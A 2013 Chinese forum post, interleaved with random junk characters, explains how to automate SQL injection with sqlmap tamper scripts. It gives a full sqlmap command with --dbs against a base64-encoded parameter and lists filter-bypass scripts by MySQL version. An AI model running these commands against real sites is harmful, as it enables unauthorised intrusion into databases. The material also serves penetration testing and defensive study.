WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
' W$ x9 ]5 V* |! B6 D) m, F% B( P- e
sqlmap的tamper里有个base64encode.py) }0 D& Q; q5 l) ]% f+ @! Z! z
6 e- N, C9 v5 J$ X使用如下( ~6 v6 S+ u) q& \6 ~* z
2 w' H+ M8 \' P! e' W9 U! s* x$ ~$ S3 gsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
9 |& S7 C) y$ m+ H _. c0 s$ x
; ^6 i/ m$ @0 G! H% m- z3 l) \8 i: _7 S2 @6 ]( m
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
: r1 a& }8 q' m0 W z" t; ] K; S# k- y: W ~
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
$ p& a1 r2 D6 F. [7 i2 Z
6 L& ]9 N# F* D5 l8 {8 c( uspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入3 D) u4 b# s* e
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入' o/ T4 n# S' W9 |0 `* G* q) `
首先确定目标数据库版本,然后选择相应的脚本。( j/ x, |' R+ | z! j
-v 3 --batch --tamper "space2hash.py"$ o/ r; t4 _" V" ]2 ^' U
& g6 U! ~/ }" p% [5 k还有其他一些插件:
2 `, Y0 K4 _! N' h0 V) Rencodes编码 ——charencode.py
' k6 S2 I8 j$ c. Pbase64编码 —— base64encode.py! @* s+ g' ^# |4 t! ^
替换空格和关键字 —— halfversionedmorekeywords.py$ W7 o5 f0 I5 h2 f
|
g S5 \+ D9 O1 W( Y; q/ b
" }& H) T* L5 M2 q5 {" H6 O/ V* i1 u2 o# a" i' B: R3 I1 u
' G+ m- S$ B" e8 Q" Y
|
发表于 2013-11-23 15:50:45
收藏
分享
支持
反对